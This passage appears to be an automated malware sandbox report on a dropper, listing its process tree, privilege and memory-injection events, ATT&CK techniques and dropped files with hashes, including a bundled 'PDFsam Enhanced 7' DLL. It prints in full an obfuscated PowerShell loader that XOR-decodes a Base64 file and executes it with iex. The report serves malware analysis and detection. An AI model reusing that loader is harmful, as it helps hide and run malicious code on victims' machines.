2436	powershell.exe
2964	powershell.exe
2472	powershell.exe
2588	powershell.exe
2808	powershell.exe
2412	powershell.exe
2752	powershell.exe
2668	powershell.exe
2820	powershell.exe
1724	powershell.exe
2992	powershell.exe
2576	705ba650-5bf0-4e56-b6a7-e0998f5884d4.exe
2576	705ba650-5bf0-4e56-b6a7-e0998f5884d4.exe

Suspicious use of AdjustPrivilegeToken 11 IoCs

description	pid	Process
Token: SeDebugPrivilege	2436	powershell.exe
Token: SeDebugPrivilege	2964	powershell.exe
Token: SeDebugPrivilege	2668	powershell.exe
Token: SeDebugPrivilege	1724	powershell.exe
Token: SeDebugPrivilege	2820	powershell.exe
Token: SeDebugPrivilege	2472	powershell.exe
Token: SeDebugPrivilege	2808	powershell.exe
Token: SeDebugPrivilege	2412	powershell.exe
Token: SeDebugPrivilege	2992	powershell.exe
Token: SeDebugPrivilege	2752	powershell.exe
Token: SeDebugPrivilege	2588	powershell.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
2576	705ba650-5bf0-4e56-b6a7-e0998f5884d4.exe
2576	705ba650-5bf0-4e56-b6a7-e0998f5884d4.exe
2576	705ba650-5bf0-4e56-b6a7-e0998f5884d4.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1116 wrote to memory of 2364	1116	77fa1b6fc7f192b0c983d1f8ecc73effae4f688a49439a7df27e76cfba870d23.exe	28
PID 1116 wrote to memory of 2364	1116	77fa1b6fc7f192b0c983d1f8ecc73effae4f688a49439a7df27e76cfba870d23.exe	28
PID 1116 wrote to memory of 2364	1116	77fa1b6fc7f192b0c983d1f8ecc73effae4f688a49439a7df27e76cfba870d23.exe	28
PID 1116 wrote to memory of 2364	1116	77fa1b6fc7f192b0c983d1f8ecc73effae4f688a49439a7df27e76cfba870d23.exe	28
PID 1116 wrote to memory of 2364	1116	77fa1b6fc7f192b0c983d1f8ecc73effae4f688a49439a7df27e76cfba870d23.exe	28
PID 1116 wrote to memory of 2364	1116	77fa1b6fc7f192b0c983d1f8ecc73effae4f688a49439a7df27e76cfba870d23.exe	28
PID 1116 wrote to memory of 2364	1116	77fa1b6fc7f192b0c983d1f8ecc73effae4f688a49439a7df27e76cfba870d23.exe	28
PID 1116 wrote to memory of 2668	1116	77fa1b6fc7f192b0c983d1f8ecc73effae4f688a49439a7df27e76cfba870d23.exe	29
PID 1116 wrote to memory of 2668	1116	77fa1b6fc7f192b0c983d1f8ecc73effae4f688a49439a7df27e76cfba870d23.exe	29
PID 1116 wrote to memory of 2668	1116	77fa1b6fc7f192b0c983d1f8ecc73effae4f688a49439a7df27e76cfba870d23.exe	29
PID 1116 wrote to memory of 2668	1116	77fa1b6fc7f192b0c983d1f8ecc73effae4f688a49439a7df27e76cfba870d23.exe	29
PID 1116 wrote to memory of 2820	1116	77fa1b6fc7f192b0c983d1f8ecc73effae4f688a49439a7df27e76cfba870d23.exe	31
PID 1116 wrote to memory of 2820	1116	77fa1b6fc7f192b0c983d1f8ecc73effae4f688a49439a7df27e76cfba870d23.exe	31
PID 1116 wrote to memory of 2820	1116	77fa1b6fc7f192b0c983d1f8ecc73effae4f688a49439a7df27e76cfba870d23.exe	31
PID 1116 wrote to memory of 2820	1116	77fa1b6fc7f192b0c983d1f8ecc73effae4f688a49439a7df27e76cfba870d23.exe	31
PID 1116 wrote to memory of 2808	1116	77fa1b6fc7f192b0c983d1f8ecc73effae4f688a49439a7df27e76cfba870d23.exe	33
PID 1116 wrote to memory of 2808	1116	77fa1b6fc7f192b0c983d1f8ecc73effae4f688a49439a7df27e76cfba870d23.exe	33
PID 1116 wrote to memory of 2808	1116	77fa1b6fc7f192b0c983d1f8ecc73effae4f688a49439a7df27e76cfba870d23.exe	33
PID 1116 wrote to memory of 2808	1116	77fa1b6fc7f192b0c983d1f8ecc73effae4f688a49439a7df27e76cfba870d23.exe	33
PID 1116 wrote to memory of 2436	1116	77fa1b6fc7f192b0c983d1f8ecc73effae4f688a49439a7df27e76cfba870d23.exe	35
PID 1116 wrote to memory of 2436	1116	77fa1b6fc7f192b0c983d1f8ecc73effae4f688a49439a7df27e76cfba870d23.exe	35
PID 1116 wrote to memory of 2436	1116	77fa1b6fc7f192b0c983d1f8ecc73effae4f688a49439a7df27e76cfba870d23.exe	35
PID 1116 wrote to memory of 2436	1116	77fa1b6fc7f192b0c983d1f8ecc73effae4f688a49439a7df27e76cfba870d23.exe	35
PID 1116 wrote to memory of 2752	1116	77fa1b6fc7f192b0c983d1f8ecc73effae4f688a49439a7df27e76cfba870d23.exe	37
PID 1116 wrote to memory of 2752	1116	77fa1b6fc7f192b0c983d1f8ecc73effae4f688a49439a7df27e76cfba870d23.exe	37
PID 1116 wrote to memory of 2752	1116	77fa1b6fc7f192b0c983d1f8ecc73effae4f688a49439a7df27e76cfba870d23.exe	37
PID 1116 wrote to memory of 2752	1116	77fa1b6fc7f192b0c983d1f8ecc73effae4f688a49439a7df27e76cfba870d23.exe	37
PID 1116 wrote to memory of 1724	1116	77fa1b6fc7f192b0c983d1f8ecc73effae4f688a49439a7df27e76cfba870d23.exe	39
PID 1116 wrote to memory of 1724	1116	77fa1b6fc7f192b0c983d1f8ecc73effae4f688a49439a7df27e76cfba870d23.exe	39
PID 1116 wrote to memory of 1724	1116	77fa1b6fc7f192b0c983d1f8ecc73effae4f688a49439a7df27e76cfba870d23.exe	39
PID 1116 wrote to memory of 1724	1116	77fa1b6fc7f192b0c983d1f8ecc73effae4f688a49439a7df27e76cfba870d23.exe	39
PID 1116 wrote to memory of 2412	1116	77fa1b6fc7f192b0c983d1f8ecc73effae4f688a49439a7df27e76cfba870d23.exe	41
PID 1116 wrote to memory of 2412	1116	77fa1b6fc7f192b0c983d1f8ecc73effae4f688a49439a7df27e76cfba870d23.exe	41
PID 1116 wrote to memory of 2412	1116	77fa1b6fc7f192b0c983d1f8ecc73effae4f688a49439a7df27e76cfba870d23.exe	41
PID 1116 wrote to memory of 2412	1116	77fa1b6fc7f192b0c983d1f8ecc73effae4f688a49439a7df27e76cfba870d23.exe	41
PID 1116 wrote to memory of 2472	1116	77fa1b6fc7f192b0c983d1f8ecc73effae4f688a49439a7df27e76cfba870d23.exe	43
PID 1116 wrote to memory of 2472	1116	77fa1b6fc7f192b0c983d1f8ecc73effae4f688a49439a7df27e76cfba870d23.exe	43
PID 1116 wrote to memory of 2472	1116	77fa1b6fc7f192b0c983d1f8ecc73effae4f688a49439a7df27e76cfba870d23.exe	43
PID 1116 wrote to memory of 2472	1116	77fa1b6fc7f192b0c983d1f8ecc73effae4f688a49439a7df27e76cfba870d23.exe	43
PID 1116 wrote to memory of 2992	1116	77fa1b6fc7f192b0c983d1f8ecc73effae4f688a49439a7df27e76cfba870d23.exe	44
PID 1116 wrote to memory of 2992	1116	77fa1b6fc7f192b0c983d1f8ecc73effae4f688a49439a7df27e76cfba870d23.exe	44
PID 1116 wrote to memory of 2992	1116	77fa1b6fc7f192b0c983d1f8ecc73effae4f688a49439a7df27e76cfba870d23.exe	44
PID 1116 wrote to memory of 2992	1116	77fa1b6fc7f192b0c983d1f8ecc73effae4f688a49439a7df27e76cfba870d23.exe	44
PID 1116 wrote to memory of 2964	1116	77fa1b6fc7f192b0c983d1f8ecc73effae4f688a49439a7df27e76cfba870d23.exe	46
PID 1116 wrote to memory of 2964	1116	77fa1b6fc7f192b0c983d1f8ecc73effae4f688a49439a7df27e76cfba870d23.exe	46
PID 1116 wrote to memory of 2964	1116	77fa1b6fc7f192b0c983d1f8ecc73effae4f688a49439a7df27e76cfba870d23.exe	46
PID 1116 wrote to memory of 2964	1116	77fa1b6fc7f192b0c983d1f8ecc73effae4f688a49439a7df27e76cfba870d23.exe	46
PID 1116 wrote to memory of 2588	1116	77fa1b6fc7f192b0c983d1f8ecc73effae4f688a49439a7df27e76cfba870d23.exe	49
PID 1116 wrote to memory of 2588	1116	77fa1b6fc7f192b0c983d1f8ecc73effae4f688a49439a7df27e76cfba870d23.exe	49
PID 1116 wrote to memory of 2588	1116	77fa1b6fc7f192b0c983d1f8ecc73effae4f688a49439a7df27e76cfba870d23.exe	49
PID 1116 wrote to memory of 2588	1116	77fa1b6fc7f192b0c983d1f8ecc73effae4f688a49439a7df27e76cfba870d23.exe	49
PID 2364 wrote to memory of 2576	2364	CMmnnjAi1984unbd.exe	52
PID 2364 wrote to memory of 2576	2364	CMmnnjAi1984unbd.exe	52
PID 2364 wrote to memory of 2576	2364	CMmnnjAi1984unbd.exe	52
PID 2364 wrote to memory of 2576	2364	CMmnnjAi1984unbd.exe	52
PID 2364 wrote to memory of 2576	2364	CMmnnjAi1984unbd.exe	52
PID 2364 wrote to memory of 2576	2364	CMmnnjAi1984unbd.exe	52
PID 2364 wrote to memory of 2576	2364	CMmnnjAi1984unbd.exe	52
PID 2576 wrote to memory of 1252	2576	705ba650-5bf0-4e56-b6a7-e0998f5884d4.exe	53
PID 2576 wrote to memory of 1252	2576	705ba650-5bf0-4e56-b6a7-e0998f5884d4.exe	53
PID 2576 wrote to memory of 1252	2576	705ba650-5bf0-4e56-b6a7-e0998f5884d4.exe	53
PID 2576 wrote to memory of 1252	2576	705ba650-5bf0-4e56-b6a7-e0998f5884d4.exe	53
PID 2576 wrote to memory of 1252	2576	705ba650-5bf0-4e56-b6a7-e0998f5884d4.exe	53
PID 2576 wrote to memory of 1252	2576	705ba650-5bf0-4e56-b6a7-e0998f5884d4.exe	53

C:\Users\Admin\AppData\Local\Temp\77fa1b6fc7f192b0c983d1f8ecc73effae4f688a49439a7df27e76cfba870d23.exe
"C:\Users\Admin\AppData\Local\Temp\77fa1b6fc7f192b0c983d1f8ecc73effae4f688a49439a7df27e76cfba870d23.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1116
- C:\Users\Admin\AppData\Local\Temp\CMmnnjAi1984unbd.exe
  "C:\Users\Admin\AppData\Local\Temp\CMmnnjAi1984unbd.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2364
- - C:\Users\Admin\AppData\Local\Temp\705ba650-5bf0-4e56-b6a7-e0998f5884d4.exe
    C:\Users\Admin\AppData\Local\Temp\705ba650-5bf0-4e56-b6a7-e0998f5884d4.exe /update=start
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Modifies system certificate store
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:2576
  - - C:\Windows\SysWOW64\regsvr32.exe
      regsvr32.exe /s "C:\ProgramData\PDFsam Enhanced 7\Installation\Statistics.dll"
      4⤵
      Loads dropped DLL
      Modifies registry class
      PID:1252
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$xp='C:\Users\Admin\AppData\Local\Temp\FkJB11kdJJhbdDl';$xk='CjWedSgpxoUycXNRFbYABulzDLvfGIZmhHQTPMEnakqtrsKOJVwi';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($xp));remove-item $xp;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2668
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$xp='C:\Users\Admin\AppData\Local\Temp\FkJB11kdJJhbdDl';$xk='CjWedSgpxoUycXNRFbYABulzDLvfGIZmhHQTPMEnakqtrsKOJVwi';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($xp));remove-item $xp;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2820
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$xp='C:\Users\Admin\AppData\Local\Temp\FkJB11kdJJhbdDl';$xk='CjWedSgpxoUycXNRFbYABulzDLvfGIZmhHQTPMEnakqtrsKOJVwi';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($xp));remove-item $xp;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2808
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$xp='C:\Users\Admin\AppData\Local\Temp\FkJB11kdJJhbdDl';$xk='CjWedSgpxoUycXNRFbYABulzDLvfGIZmhHQTPMEnakqtrsKOJVwi';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($xp));remove-item $xp;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2436
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$xp='C:\Users\Admin\AppData\Local\Temp\FkJB11kdJJhbdDl';$xk='CjWedSgpxoUycXNRFbYABulzDLvfGIZmhHQTPMEnakqtrsKOJVwi';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($xp));remove-item $xp;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2752
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$xp='C:\Users\Admin\AppData\Local\Temp\FkJB11kdJJhbdDl';$xk='CjWedSgpxoUycXNRFbYABulzDLvfGIZmhHQTPMEnakqtrsKOJVwi';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($xp));remove-item $xp;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1724
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$xp='C:\Users\Admin\AppData\Local\Temp\FkJB11kdJJhbdDl';$xk='CjWedSgpxoUycXNRFbYABulzDLvfGIZmhHQTPMEnakqtrsKOJVwi';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($xp));remove-item $xp;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2412
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$xp='C:\Users\Admin\AppData\Local\Temp\FkJB11kdJJhbdDl';$xk='CjWedSgpxoUycXNRFbYABulzDLvfGIZmhHQTPMEnakqtrsKOJVwi';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($xp));remove-item $xp;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2472
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$xp='C:\Users\Admin\AppData\Local\Temp\FkJB11kdJJhbdDl';$xk='CjWedSgpxoUycXNRFbYABulzDLvfGIZmhHQTPMEnakqtrsKOJVwi';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($xp));remove-item $xp;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"
  2⤵
  - Drops startup file
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2992
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$xp='C:\Users\Admin\AppData\Local\Temp\FkJB11kdJJhbdDl';$xk='CjWedSgpxoUycXNRFbYABulzDLvfGIZmhHQTPMEnakqtrsKOJVwi';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($xp));remove-item $xp;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2964
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$xp='C:\Users\Admin\AppData\Local\Temp\FkJB11kdJJhbdDl';$xk='CjWedSgpxoUycXNRFbYABulzDLvfGIZmhHQTPMEnakqtrsKOJVwi';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($xp));remove-item $xp;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2588

C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{77EC23C5-BB68-4A7B-AE5C-F4AD0B6C678D}
1⤵
- Loads dropped DLL
PID:1640

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\PDFsam Enhanced 7\Installation\Statistics.dll

Filesize
2.7MB

MD5
417f5c1e34d2abc002301ba08c546b6d

SHA1
834a9410da82fecbcb00e641fb403919ec11f3b9

SHA256
2aee68c1d66e0bd7741dbe002719c71017094fe3bb506f75aaa859815a089329

SHA512
cb2f38d22025cfb4f276691e1e10eae47b659b6375f8cba7366ba6a7ec2384b5886764913ca69e274ec000133276b8fbddc33a8567dd576f3e498429b69ce605

Download Submit
C:\ProgramData\PDFsam Enhanced 7\Installation\curl-ca-bundle.crt

Filesize
217KB

MD5
1e32496378e8fee43cb01b0689963a67

SHA1
1d4ce2b3dd7f71f4725e6a030d6e25b8a4731508

SHA256
5b47aee36f594b7737e00990c9922a87252729b74cc2f1a83c0fceed9816bdb9

SHA512
80339d47b383ee0bce769e3723fb2aa1925e6963325733fc12435138f98c996912851792c8ea451ed3eff66e1b74dee984662f759e894f5a663115fcb4005253

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

Filesize
68KB

MD5
29f65ba8e88c063813cc50a4ea544e93

SHA1
05a7040d5c127e68c25d81cc51271ffb8bef3568

SHA256
1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

SHA512
e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C0818D6C839FFFA99AF7D6971537495F

Filesize
1KB

MD5
4fdd07e4d42264391e0c3742ead1c6ae

SHA1
8094640eb5a7a1ca119c1fddd59f810263a7fbd1

SHA256
2cabeafe37d06ca22aba7391c0033d25982952c453647349763a3ab5ad6ccf69

SHA512
626261dcc0001d3bf73f9bd041067c78cbd19337c9dfcb2fb0854f24015efa662a7441dc5389de7c1ca4f464b44bf99b6df710661a9a8902ad907ee231dba74a

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
791c202665d2b1718bbe841a4c96eade

SHA1
01d1d298c5ab6182898ca1c798cc0f17ad068170

SHA256
f9e4ebf2de54c78832d22460a08bc67cdf83c80046b7acecb950f83e711c6758

SHA512
8faa7f7e44eba97124e157dd894e291b2ff8e5c3f54901f04e179d9ceba5cb20c3539197419f34e4eb61216c1bf9aa917c1ce80f705bb46884d41bcac9ae0172

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
274919fcc05416c0b3dd01f3b68ed96b

SHA1
4f207dbe8f2dd340f55ed34f6dd48ecf00b0076a

SHA256
8cbf86d907746297b70511118796ed551bdc5675b293f88d2f857b7fb90ae812

SHA512
cf005fd8eaff919b02470bc690dd8e0000a517adf52e2cca49d436462f79c7ec04b0b86785a6e3e4b871d90fb263e57c0f436892468250cb7f072729e8d0ce46

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C0818D6C839FFFA99AF7D6971537495F

Filesize
242B

MD5
69e1cf9d612a09a8ebfc232364d7fda2

SHA1
c384863c6b61a2a7e60c7bded5e5dadbf14ff28a

SHA256
31121371c275c43cd1e744fe3e60a157c629160d112e13cb2e97f72488ff8aa9

SHA512
63288dcc7c2da25258beb1b7af0230b9827049c704d73b390fa281b874d2377c1cce3de0ef8bd79a3d913935b310c971bc5d01d2252462d844db4d3dce8041ca

Download Submit
C:\Users\Admin\AppData\Local\Temp\FkJB11kdJJhbdDl

Filesize
116KB

MD5
303321963f774dce2668053585cb7ccc

SHA1
a6c29d3655e26f038e6a175f71e6c95ecf825672

SHA256
c516e821960cb5651a0eb6c5013193bd8f8b944277f3ed1b8a9dd4f599cd51aa

SHA512
599f4c5a159dbeb999478004f80e2aa6743a3e71a5c0eb75633e3ec173385c66f6661df2777c7901632c092fc455d946fb09180a0315584add4a848ab0681f52

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar69E1.tmp

Filesize
177KB

MD5
435a9ac180383f9fa094131b173a2f7b

SHA1
76944ea657a9db94f9a4bef38f88c46ed4166983

SHA256
67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

SHA512
1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
1c9051d065bd36cdfdbac3ff8f9aa301

SHA1
f03d9bebcd19ebe632e3a6f2ddf94d1b8e34920b

SHA256
6dff76e4f2e3bc0e3c386578ef7b5895b56113be87c93a64d9831bda2aa76040

SHA512
1e4b5a03674620e0abcf0a387dfd7f1983f124e407aac7c71f5087848182a435eefc61fa115af08f2b9502473c5bffb25350e340a7f4f4b4d1487379af07c404

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\skBVhLYeyoAUM\GWUnoKRrgVEmAzITdp.IDYXSRJBrCVmdMg

Filesize
65KB

MD5
dfd857997c4e8b5b44101225d3de47c4

SHA1
410e2057507eff78b8469b70e45de256c0dfc56a

SHA256
f1112205eeb0827f9479160aefe49f9e0e685c924ca7a2a0b5a7b02235f125cf

SHA512
d63a3c072b36fbef7bf72b25cc91c455d6e32472db31542f11f72a0a66882b288ffbcc1c3c2e1658ed384a14c021034727492e1f431da15485a2f153fb4452de

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\skBVhLYeyoAUM\LTPYmzurQdItxJowf.eSGTDafrvZPhdwWblB

Filesize
105KB

MD5
a68d794aeb46285c3070aecabc546b38

SHA1
8d7006a1bba3b6727e401339a7af220d680712a9

SHA256
77c8d50c791541b9ba71af7670981b272c742d0c1591074d49aef5910b65924b

SHA512
393225cbcbff393e88087459fd47046ff7bdeba48762900d7e802f116ba287497a998b7b7c115201ff11cc1a637c9be34eaceb8ef8b11bd2f26d04218b42a58a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\skBVhLYeyoAUM\wjURbXiZYWlsSfz.rclegbHiaDWh

Filesize
121KB

MD5
72ab0738321c7bc95a86e564cb02bb85

SHA1
852a10c3e7818b610ddeeecf9f68737195c08944

SHA256
e77d0f4d6fc6c95265c66c82a7ec0b3e91199a1b5356b40d0adc8b5d0e94c78a

SHA512
e59b239c570c1c1d9d6fad753e75297e54b0a60a4a8710f897ad4e9a713f3bba8e6caf3fc0605efdda2a9b4a909dba7b79b9b169e37dd6773697f7d358590e79

Download Submit
\Users\Admin\AppData\Local\Temp\CMmnnjAi1984unbd.exe

Filesize
16.1MB

MD5
cb777c669a7756c471902cd7e4bb2382

SHA1
34915534d6090ff937a09b4298d8edd0b3b68844

SHA256
83b50b18ebfa4402b2c0d2d166565ee90202f080d903fd15cccd1312446a636e

SHA512
b3cb5b8e0cb35c41d0f3a022be488b1b41e907c840a9188e1c17a16bcd1ff470051fb7bc445801b6099881ad020e469ca0dd30ce5814cbb82e4f2aa426501007

Download Submit
memory/1116-32-0x0000000000400000-0x0000000001400000-memory.dmp

Filesize
16.0MB

Download
memory/1116-0-0x0000000000220000-0x0000000000221000-memory.dmp

Filesize
4KB

Download
memory/1724-66-0x0000000073920000-0x0000000073ECB000-memory.dmp

Filesize
5.7MB

Download
memory/1724-267-0x0000000073920000-0x0000000073ECB000-memory.dmp

Filesize
5.7MB

Download
memory/2412-272-0x0000000073920000-0x0000000073ECB000-memory.dmp

Filesize
5.7MB

Download
memory/2412-72-0x0000000073920000-0x0000000073ECB000-memory.dmp

Filesize
5.7MB

Download
memory/2412-500-0x0000000002F00000-0x0000000002F40000-memory.dmp

Filesize
256KB

Download
memory/2412-73-0x0000000002F00000-0x0000000002F40000-memory.dmp

Filesize
256KB

Download
memory/2436-65-0x0000000073920000-0x0000000073ECB000-memory.dmp

Filesize
5.7MB

Download
memory/2436-68-0x00000000029F0000-0x0000000002A30000-memory.dmp

Filesize
256KB

Download
memory/2436-268-0x0000000073920000-0x0000000073ECB000-memory.dmp

Filesize
5.7MB

Download
memory/2472-273-0x0000000073920000-0x0000000073ECB000-memory.dmp

Filesize
5.7MB

Download
memory/2588-269-0x0000000073920000-0x0000000073ECB000-memory.dmp

Filesize
5.7MB

Download
memory/2668-67-0x00000000028A0000-0x00000000028E0000-memory.dmp

Filesize
256KB

Download
memory/2668-173-0x0000000073920000-0x0000000073ECB000-memory.dmp

Filesize
5.7MB

Download
memory/2668-63-0x0000000073920000-0x0000000073ECB000-memory.dmp

Filesize
5.7MB

Download
memory/2752-265-0x0000000073920000-0x0000000073ECB000-memory.dmp

Filesize
5.7MB

Download
memory/2752-71-0x0000000073920000-0x0000000073ECB000-memory.dmp

Filesize
5.7MB

Download
memory/2808-266-0x0000000073920000-0x0000000073ECB000-memory.dmp

Filesize
5.7MB

Download
memory/2808-64-0x0000000073920000-0x0000000073ECB000-memory.dmp

Filesize
5.7MB

Download
memory/2820-69-0x0000000000300000-0x0000000000340000-memory.dmp

Filesize
256KB

Download
memory/2820-270-0x0000000073920000-0x0000000073ECB000-memory.dmp

Filesize
5.7MB

Download
memory/2820-70-0x0000000073920000-0x0000000073ECB000-memory.dmp

Filesize
5.7MB

Download
memory/2820-62-0x0000000073920000-0x0000000073ECB000-memory.dmp

Filesize
5.7MB

Download
memory/2964-271-0x0000000073920000-0x0000000073ECB000-memory.dmp

Filesize
5.7MB

Download
memory/2992-291-0x0000000073920000-0x0000000073ECB000-memory.dmp

Filesize
5.7MB

Download
